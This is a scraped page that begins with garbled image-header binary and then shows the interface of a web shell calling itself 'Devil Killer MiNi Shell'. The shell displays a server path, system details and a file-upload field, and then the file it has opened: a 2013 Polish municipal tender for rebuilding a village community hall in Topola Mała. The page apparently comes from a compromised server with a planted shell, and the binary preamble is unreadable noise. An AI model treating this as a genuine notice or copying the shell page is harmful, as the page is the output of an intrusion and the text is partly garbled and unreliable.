JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130314/103362-N-2013.html

<p class="kh_header"><b>Ostrów Wielkopolski: Przebudowa i rozbudowa świetlicy wiejskiej w miejscowości Topola Mała, Gmina Ostrów Wielkopolski, Al. Powstańców Wielkopolskich 12, woj. wielkopolskie</b><br>
<b>Numer ogłoszenia: 103362 - 2013; data zamieszczenia: 14.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ostrów Wielkopolski , Aleje Powstańców Wielkopolskich 12, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 062/7351190.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ostrowwielkopolski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i rozbudowa świetlicy wiejskiej w miejscowości Topola Mała, Gmina Ostrów Wielkopolski, Al. Powstańców Wielkopolskich 12, woj. wielkopolskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa i rozbudowa świetlicy wiejskiej w miejscowości Topola Mała, ul. Szkolna 95, działka nr 316.

STAN ISTNIEJĄCY:

Na działce geodezyjnej nr 316 obręb geodezyjny Topola Mała znajduje się parterowy budynek pokryty dwuspadowym dachem. 
Budynek przed rozbudową o powierzchni zabudowy - 491,50 m2, po rozbudowie 557,84 m2.

Przedmiotem zamówienia jest przebudowa budynku świetlicy wiejskiej w Topoli Małej.

DO WYKONANIA:

Demontaż pokrycia z płyt azbestowo-cementowych i wykonanie nowej konstrukcji 
dachu budynku
- rozbudowa budynku - część socjalna
- wykonanie izolacji fundamentów
- wykonanie konstrukcji dachu
- pokrycie dachu
- wykonanie obróbek blacharskich
- montaż rynien i rur spustowych
- wykonanie podłoży i posadzek
- wykonanie tynków wewnętrznych i licowanie ścian płytkami
- wykonanie sufitów podwieszanych
- montaż stolarki okiennej i drzwiowej 
- montaż parapetów wewnętrznych i zewnętrznych 
- roboty malarskie
- wykonanie ocieplenia budynku wraz z wykonaniem elewacji
- instalacje elektryczne
- instalacje sanitarne wodno-kanalizacyjne i c.o., wentylacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających. 
Rozszerzenie zakresu zamówienia poprzez powtórzenie tego samego rodzaju zamówienia zgodnie z zapisami art.67 ust.1 pkt.6 ustawy Pzp. o wartości nie wyższej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.12.10-9, 45.26.26.60-5, 45.21.00.00-2, 45.33.00.00-9, 45.33.10.00-6, 45.33.24.00-7, 45.33.11.00-7, 45.33.12.10-1, 45.34.30.00-3, 45.31.11.00-1, 45.31.12.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść 
 wadium w wysokości: 5.000,00 zł (słownie: pięć tysięcy zł 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki,  o których mowa w art.22 ust.1 i nie podlegają wykluczeniu na podstawie art.24 ustawy Pzp. dotyczące: 
potwierdzających posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli 
 	przepisy prawa nakładają obowiązek ich posiadania - wszczególności konsesji, zezwolenia lub licencji. 
	Zamawiający nie stawia szczegółowych warunków w tym zakresie.
Ocena spełnienia warunków udziału w postępowaniu przez Wykonawców, określonych w pkt.9.1 SIWZ, będzie dokonana w oparciu o kompletność 
i  prawidłowość złożonych wraz z ofertą oświadczeń i dokumentów, jakich żąda Zamawiający i zostanie dokonana na podstawie treści tych dokumentów według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykażą w ciągu ostatnich 5 lat przed upływem terminu składania ofert, 
 		a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonanie  
 		co najmniej jednej roboty budowlanej o wartości nie mniejszej niż 
 		600.000,00 PLN brutto, polegającej na wykonaniu robót budowlanych
 		związanych ze wznoszeniem ścian budynku, budową lub przebudową, 
 		wykonaniem konstrukcji dachu i jego pokryciem, wykonaniu
 		robót instalacyjnych wodno-kanalizacyjnych c.o., instalacji elektrycznych,
 	 	wykończeniowych ścian, montażu stolarki okiennej i drzwiowej,
 		- odpowiadającej zakresem i złożonością przedmiotu zamówienia - zrealizowanej
  		w jednym zamówieniu na obiekcie użyteczności publicznej.
	Zamawiający wymaga, aby roboty te zostały wykonane zgodnie z zasadami sztuki 
 	budowlanej i prawidłowo ukończone - potwierdzone przez Zamawiających.
Ocena spełnienia warunków udziału w postępowaniu przez Wykonawców, określonych w pkt.9.1 SIWZ, będzie dokonana w oparciu o kompletność 
i  prawidłowość złożonych wraz z ofertą oświadczeń i dokumentów, jakich żąda Zamawiający i zostanie dokonana na podstawie treści tych dokumentów według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do  	wykonania zamówienia tj.:
 	a) wskażą kierownika budowy, który posiada uprawnienia budowlane do 
 		kierowania robotami budowlanymi o specjalności konstrukcyjno-budowlanej w 
 		zakresie niezbędnym do wykonania przedmiotu zamówienia lub odpowiadające 
 		im 	ważne uprawnienia budowlane, które zostały wydane na podstawie 
 		wcześniej 	obowiązujących przepisów w tym zakresie oraz należy (przynajmniej 
 		na dzień składania ofert) do właściwej izby samorządu zawodowego, wskażą
 		kierownika robót posiadającego uprawnienia budowlane w specjalności
 		instalacyjnej w zakresie instalacji i urządzeń elektrycznych 
 		i elektroenergetycznych, wskażą kierownika robót w 	specjalności sieci, instalacji
 		i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych 
 		i kanalizacyjnych (bez ograniczeń) do kierowania robotami budowlanymi, wydane 
 		na podstawie obowiązujących przepisów prawa (lub uprawnienia w zakresie sieci
 		wodociągowych i kanalizacyjnych wydane na podstawie wcześniej 
 		obowiązujących przepisów, wystarczające do realizacji  przedmiotu zamówienia), 
 		oraz należą (przynajmniej na dzień składania ofert) do właściwej izby samorządu 
 		zawodowego - oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu 
 		zamówienia posiadają wymagane uprawnienia.
Ocena spełnienia warunków udziału w postępowaniu przez Wykonawców, określonych w pkt.9.1 SIWZ, będzie dokonana w oparciu o kompletność 
i  prawidłowość złożonych wraz z ofertą oświadczeń i dokumentów, jakich żąda Zamawiający i zostanie dokonana na podstawie treści tych dokumentów według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacji ekonomicznej i finansowej tj.:
	a) wykażą, że posiadają (aktualne i opłacone przynajmniej na dzień składania 
 		ofert) ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej 
 		działalności gospodarczej związanej z przedmiotem zamówienia, na kwotę nie 
 		mniejszą niż 500.000,00 PLN,
	b) wykażą, że posiadają środki finansowe na realizację przedmiotowego 
 		zamówienia na podstawie informacji banku lub spółdzielczej kasy 
 		oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek 
 		bankowy potwierdzającej wartość posiadanych środków finansowych lub 
 		zdolność kredytową wykonawcy wystawionej nie wcześniej niż 3 miesiące 
 		przed upływem terminu składania ofert w postępowaniu o udzielenie 
 		zamówienia.
Ocena spełnienia warunków udziału w postępowaniu przez Wykonawców, określonych w pkt.9.1 SIWZ, będzie dokonana w oparciu o kompletność 
i  prawidłowość złożonych wraz z ofertą oświadczeń i dokumentów, jakich żąda Zamawiający i zostanie dokonana na podstawie treści tych dokumentów według formuły spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy dołączyć - wypełnione i podpisane:
a)	formularz oferty,
b)	oświadczenia i dokumenty, o których mowa w pkt.10,
c)	kosztorys ofertowy, 
d)	dowód wzniesienia wadium,
e)	dokumenty potwierdzające uprawnienia osób podpisujących ofertę o ile uprawnienia te nie wynikają z przepisów prawa lub innych dokumentów rejestrowych,
f)	projekt umowy zaakceptowany przez wykonawcę,
g)	projekt karty gwarancyjnej zaakceptowany przez wykonawcę.



W związku z nowelizacja ustawy Prawo zamówień publicznych, która weszła w życie 20.02.2013r. oraz Rozporządzeniem Prezesa Rady Ministrów z dnia 19.02.2013r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane, które weszło wżycie 20.02.2013r. zamawiający żąda następujących dokumentów:
Wraz z ofertą Wykonawca zobowiązany jest do złożenia:
1.	 Oświadczenia o spełnieniu warunków udziału w postępowaniu - wzór stanowi
 załącznik do SIWZ.

2.	  Oświadczenie o braku podstaw do wykluczenia z postępowania - wzór stanowi 
załącznik do SIWZ.

3.	Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji 
o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub 
ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art.24 ust.1 
pkt.2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu
składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 
4.	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności 
 	odpowiedzialnych za świadczenie usług, kontrole jakości lub kierowanie robotami
          budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,
 	doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także
 	zakresu wykonywanych prze nie czynności, oraz informację o podstawie do
 	dysponowania tymi osobami.

5.  Pisemne zobowiązanie innych podmiotów do udostępnienia osób wskazanych 
 	w wykazie, o którym mowa w pkt.10.4. SIWZ - w wypadku gdy Wykonawca 
 	nie dysponuje takimi osobami.

6.   Oświadczenia, że osoby, które  będą uczestniczyć w wykonywaniu zamówienia 
 	spełniają wymagania, o których mowa w pkt.9.1.3.a) SIWZ, tj. kierownik budowy - posiadają uprawnienia
 	budowlane do kierowania robotami budowlanymi, kierownik robót - o specjalności instalacyjnej 
 	w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, 
	wodociągowych i kanalizacyjnych bez ograniczeń w zakresie niezbędnym do
 	wykonania przedmiotu zamówienia lub odpowiadające im ważne uprawnienia 
	budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów 
	w tym zakresie oraz należą (przynajmniej na dzień składania ofert) do właściwej izby 
	samorządu zawodowego - oświadczenie to zawiera druk Formularz oferty,  którego 
	wzór stanowi załącznik do SIWZ.

7. 	Wykazu robót budowlanych wykonanych w okresie ostatnich pięciu lat przed 
 	upływem terminu składania ofert albo wniosków o dopuszczenie do udziału 
    	w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,
   	wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem 
 	dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały 
 	wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie  
   	z zasadami sztuki budowlanej i prawidłowo ukończone, spełniających warunki, 
   	o których mowa w pkt.9.1.2. a) SIWZ - wzór wykazu (wymagany zakres informacji)   
   	stanowi załącznik do SIWZ, w zakresie niezbędnym do wykazania spełnienia
   	warunku wiedzy i doświadczenia.

8.	Dokumentów potwierdzających, że roboty budowlane wskazane w wykazie, o którym
   mowa w pkt.10.7 SIWZ zostały wykonane zgodnie z zasadami sztuki budowlanej
   i prawidłowo ukończone.
Dokumentami tymi są: poświadczenie, inne dokumenty - jeżeli z uzasadnionych
przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać 
poświadczenia.
9.    Opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że 
 	wykonawca jest ubezpieczony (przynajmniej na dzień składania ofert) od 
      	odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej 
   	związanej z przedmiotem zamówienia.

10.	Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym 
wykonawca posiada rachunek potwierdzającej wysokość posiadanych środków
finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 
3 miesiące przed upływem terminu do składania ofert w postępowaniu o udzielenie
zamówienia.

11.	Aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego   
 	potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, lub 
	zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub 
	rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji 
	właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem 
	terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie 
	zamówienia albo składania ofert.
12.	Aktualnego zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych 
lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca 
nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub 
potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub 
rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji 
właściwego organu -wystawionego nie wcześniej niż 3 miesiące przed upływem 
terminu składania wniosków o dopuszczenie do udziału w postępowaniu 
o udzielenie zamówienia albo składania ofert.

13.	Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art.24  
ust.1 pkt.4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed 
upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu 
o udzielenie zamówienia albo składania ofert.

14.	Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art.24
ust.1 pkt.9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem 
 terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie
 zamówienia albo składania ofert.
15.	W przypadku wspólnego ubiegania się o niniejsze zamówienie przez dwóch lub więcej Wykonawców, każdy z tych Wykonawców dołącza do oferty dokumenty określone w pkt.10.1., 10.2., 10.3., 10.11., 10.12., 10.13., 10.14.,  - dotyczące każdego z nich.
Dokumenty, o których mowa w pkt.10.3., 10.8., 10.9., 10.10., 10.11., 10.12., 10.13., 10.14., mogą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę (osobę/y uprawnione do reprezentowania Wykonawcy), pozostałe dokumenty należy złożyć w oryginale. 
16.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku, gdy wykonawca wykazując spełnienie warunku, o którym mowa w pkt.9.1.2.a), 9.1.3 a) i 9.1.4.a) SIWZ polega na zasobach  innych podmiotów, na zasadach określonych w art.26 ust.2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczone za zgodność 
z oryginałem przez wykonawcę lub te podmioty.
17.	Listę podmiotów należących do tej samej grupy kapitałowej (jeżeli dotyczy) lub informację o braku przynależności do grupy kapitałowej stanowiącej załącznik 
do SIWZ.
18.	Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art.22 ust.1 ustawy Pzp określonych w Rozdziale 9 ust.9.1.2a SIWZ - polega na zasobach innych podmiotów, na zasadach określonych w art.26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia 
w odniesieniu do tych podmiotów dokumentów wymienionych w Rozdziale 10 Wykaz oświadczeń i dokumentów ust.10.1, 10.2, 10.3, 10.10, 10.11, 10.12, 10.13, 10.14 SIWZ. Postanowienia dotyczące podmiotów, które mają siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej stosuje się odpowiednio.

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej 
 	niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do
 	udziału w postępowaniu o udzielenie zamówienia albo składania ofert,  
- nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne 
   i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub 
 	rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji 
 	właściwego organu 
- wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania 
 	wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia 
 	albo składania ofert, 
 - nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie 
 	wcześniej niż 6 miesięcy przed upływem terminu składania wniosków 
 	o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania 
 	ofert.
Zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art.24 ust.1 pkt.4-8 ustawy 
- wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków 
o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert 
- albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub kraju, którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne postanowienia umowy zawarte zostały w projekcie umowy - załącznik do SIWZ.

Na podstawie art.144 ust.1 ustawy Pzp. Zamawiający przewiduje możliwość dokonania zmian zawartej umowy w stosunku do treści oferty.

Poza przypadkami określonymi w umowie, zmiany umowy będą mogły nastąpić w następujących przypadkach:

wystąpienia istotnych wad dokumentacji projektowej skutkujących koniecznością dokonania poprawek lub uzupełnień, jeżeli uniemożliwia to lub istotnie wstrzymuje realizację określonego rodzaju robót mających wpływ na zmianę terminu realizacji - zmianie ulegnie odpowiednio termin realizacji zamówienia;

zaistnienia okoliczności leżących po stronie zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie może ulec termin realizacji umowy oraz terminy wynikające z harmonogramu;

gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania, zgodnie ze specyfikacją istotnych warunków zamówienia - zamawiający dopuszcza możliwość zmiany umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ostrowwielkopolski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Ostrów Wielkopolski 
 	Al. Powstańców Wielkopolskich 12, pokój nr 3..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2013 godzina 08:30, miejsce: Urząd Gminy Ostrów Wielkopolski Al. Powstańców Wielkopolskich 12, pokój nr 2..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




